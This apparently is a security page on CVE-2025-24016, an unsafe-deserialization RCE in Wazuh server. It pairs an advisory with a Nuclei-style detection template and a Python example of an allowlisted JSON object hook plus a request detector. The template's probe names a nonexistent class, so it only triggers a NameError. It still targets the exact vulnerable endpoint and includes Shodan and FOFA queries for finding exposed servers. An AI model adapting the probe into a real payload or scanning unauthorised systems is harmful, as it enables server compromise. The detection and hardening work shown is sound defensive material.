A critical Remote Code Execution (RCE) vulnerability exists in Wazuh server versions >= 4.4.0 and < 4.9.1. The vulnerability occurs due to unsafe deserialization in the wazuh-manager package, specifically in the DistributedAPI where parameters are serialized as JSON and deserialized using as_wazuh_object in the framework/wazuh/core/cluster/common.py file. An attacker with API access can exploit this vulnerability by injecting an unsanitized dictionary into DAPI requests, leading to arbitrary Python code execution.
PoC code [public]
id: CVE-2025-24016

info:
  name: Wazuh - Unsafe Deserialization Remote Code Execution
  author: Hüseyin TINTAŞ,ritikchaddha
  severity: critical
  description: |
    A critical Remote Code Execution (RCE) vulnerability exists in Wazuh server versions >= 4.4.0 and < 4.9.1. The vulnerability occurs due to unsafe deserialization in the wazuh-manager package, specifically in the DistributedAPI where parameters are serialized as JSON and deserialized using as_wazuh_object in the framework/wazuh/core/cluster/common.py file. An attacker with API access can exploit this vulnerability by injecting an unsanitized dictionary into DAPI requests, leading to arbitrary Python code execution.
  impact: |
    Successful exploitation allows attackers to execute arbitrary code on the Wazuh server with the privileges of the wazuh-manager process. This can lead to complete system compromise, data exfiltration, lateral movement within the network, and potential denial of service conditions.
  remediation: |
    Upgrade to Wazuh version >= 4.9.1 where this vulnerability has been patched. If immediate upgrade is not possible: Restrict API access to trusted IP addresses only, implement network segmentation to isolate Wazuh servers, monitor for suspicious API requests to the /security/user/authenticate/run_as endpoint, and consider implementing a Web Application Firewall (WAF) to filter malicious requests.
  reference:
    - https://github.com/MuhammadWaseem29/CVE-2025-24016
    - https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24016
  classification:
    epss-score: 0.93801
    epss-percentile: 0.99858
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-24016
    cwe-id: CWE-502
    cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: wazuh
    product: wazuh
    shodan-query: title:"Wazuh"
    fofa-query: app="Wazuh"
  tags: cve,cve2025,wazuh,deserialization,rce,authenticated,kev,vkev

flow: http(1) && http(2)

variables:
  payload: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'

http:
  # Request 1: baseline check that the unauthenticated root page does not
  # already contain "NameError", so the second matcher is not a false positive.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "NameError"
        negative: true
        internal: true

  # Request 2: authenticated probe. The marker names a class that does not
  # exist, so a vulnerable deserializer fails with NameError and HTTP 500
  # instead of executing anything. A blank line separates headers from body.
  - raw:
      - |
        POST /security/user/authenticate/run_as HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Basic {{base64(username + ':' + password)}}

        {{payload}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "NameError"

      - type: status
        status:
          - 500
# digest: 4a0a004730450221009f235cb71187bed743e69f64f2017b4e73896a4c1ef091232859caaa9575c84c022025de99cbc501e2f7085919a6471b2e228bb08e4efbc3ee5b84db427874c6791f:922c64590222798bb761d5b6d8e72950
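The description above says the weakness is a JSON object hook that rebuilds Python objects from a `__class__`/`__args__` marker without restricting which class may be named, and the template's probe relies on exactly that (an unknown class name produces a NameError). The block below is an added example, not Wazuh's `as_wazuh_object` or its patch: it shows the allowlist pattern a hardened hook should follow (the `ALLOWED_CLASSES` table, `SafeDeserializationError` and `safe_loads` are all assumed names chosen for this illustration), and a small detection check, over constructed sample requests, that flags bodies carrying such a marker sent to the `/security/user/authenticate/run_as` endpoint named in the remediation note. The regex and the sample records are constructed here, not taken from Wazuh logs.

```python
import json
import re

# --- Hardened deserialization side (illustrative, not Wazuh's code) ---------

class SafeDeserializationError(ValueError):
    """Raised when a marker names a class that is not on the allowlist."""


# Explicit allowlist: the hook may only rebuild these classes. Anything else,
# including names that happen to exist in the interpreter, is refused.
ALLOWED_CLASSES = {
    "ValueError": ValueError,
    "KeyError": KeyError,
}


def safe_object_hook(obj):
    """json.loads object_hook that rebuilds allowlisted exceptions only.

    json calls the hook bottom-up, so by the time the outer dict arrives the
    inner marker dict has already passed through unchanged.
    """
    if "__unhandled_exc__" not in obj:
        return obj
    marker = obj["__unhandled_exc__"]
    if not isinstance(marker, dict):
        raise SafeDeserializationError("marker must be a JSON object")
    cls_name = marker.get("__class__")
    cls = ALLOWED_CLASSES.get(cls_name)
    if cls is None:
        # Reject rather than look the name up anywhere (globals, builtins, ...).
        raise SafeDeserializationError(f"refusing to resolve class {cls_name!r}")
    args = marker.get("__args__", [])
    if not isinstance(args, list):
        raise SafeDeserializationError("__args__ must be a list")
    return cls(*args)


def safe_loads(text):
    """Parse JSON, rebuilding only allowlisted exception objects."""
    return json.loads(text, object_hook=safe_object_hook)


def probe_is_rejected(text):
    """True if the hardened hook refuses the document instead of resolving it."""
    try:
        safe_loads(text)
    except SafeDeserializationError:
        return True
    return False


# The harmless probe body used by the template above.
PROBE_PAYLOAD = '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'

# --- Detection side (constructed sample data) -----------------------------

PROBE_PATH = "/security/user/authenticate/run_as"
# Assumed indicator: a class-reconstruction marker inside a JSON request body.
MARKER_RE = re.compile(r'"__(?:class|unhandled_exc)__"')


def is_suspicious_request(method, path, body):
    """Flag POSTs to the run_as endpoint whose body carries a class marker."""
    return (
        method == "POST"
        and path.startswith(PROBE_PATH)
        and MARKER_RE.search(body) is not None
    )


# Constructed records in (method, path, body) form; not real API logs.
SAMPLE_REQUESTS = [
    ("POST", PROBE_PATH, PROBE_PAYLOAD),
    ("POST", PROBE_PATH, '{"run_as_context": "ordinary"}'),
    ("GET", "/", ""),
]


def flagged_requests(records=SAMPLE_REQUESTS):
    """Return the indexes of records that match the indicator."""
    return [i for i, (m, p, b) in enumerate(records) if is_suspicious_request(m, p, b)]


if __name__ == "__main__":
    print("probe rejected:", probe_is_rejected(PROBE_PAYLOAD))   # True
    print("flagged records:", flagged_requests())                # [0]
```

The hook deliberately fails closed: a name absent from `ALLOWED_CLASSES` raises before any lookup happens, which is what turns the template's NameError-and-500 signal into a clean rejection. The detection check is a coarse indicator for API access logs or a reverse proxy in front of the manager; on a patched server it still highlights probing against the endpoint the remediation note asks you to monitor.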